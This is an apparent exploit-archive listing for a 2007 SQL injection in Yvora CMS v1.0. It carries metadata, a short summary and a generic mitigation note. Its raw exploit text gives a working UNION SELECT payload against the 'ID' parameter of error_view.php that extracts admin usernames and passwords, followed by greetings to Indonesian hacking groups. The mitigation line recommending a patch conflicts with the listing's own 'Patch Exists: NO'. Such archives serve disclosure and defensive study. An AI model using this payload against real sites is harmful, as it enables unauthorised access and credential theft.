Yvora CMS v1.0 - Remote SQL Injection

vendor:

Yvora CMS

by:

k1tk4t

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: Yvora CMS

Affected Version From: Yvora CMS v1.0

Affected Version To: Yvora CMS v1.0

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Yvora CMS v1.0 – Remote SQL Injection

This exploit allows an attacker to perform a remote SQL injection attack in Yvora CMS v1.0. By manipulating the 'ID' parameter in the 'error_view.php' page, an attacker can inject malicious SQL code and retrieve sensitive information, such as usernames and passwords, from the database.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patch or update for Yvora CMS. Additionally, input validation and parameterized queries should be implemented to prevent SQL injection attacks.

Source

Exploit-DB raw data:

########################################################################
# Yvora CMS v1.0 - Remote SQL Injection
# Vendor        : http://www.yvora.nl/
# Found By      : k1tk4t - k1tk4t[4t]newhack.org
# Location      : Indonesia   --  #newhack[dot]org @irc.dal.net
########################################################################
POC;

http://www.victim.xxx/error_view.php?ID=[SQL]

Contoh;

http://www.victim.xxx/error_view.php?ID=-99+UNION+SELECT+1,2,3,password,username,6,7+from+admin_users/*

Hasil;

Error: Username
Query: Password

########################################################################
Terimakasih untuk;
str0ke
DNX,xoron,iFX,x-ace,nyubi,selikoer,k1ngk0ng
dan semua temen2 komunitas security&hacking
-----------------------
-newhack[dot]org|staff-
mR.opt1lc,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX
-----------------------
all member newhack[dot]org
-----------------------
all member www.echo.or.id
-----------------------
all member www.yogyafree.net
-----------------------
all member www.sekuritionline.net
-----------------------
all member www.kecoak-elektronik.net
-----------------------
semua komunitas hacker&security Indonesia
Cintailah Bahasa Indonesia

# milw0rm.com [2007-09-02]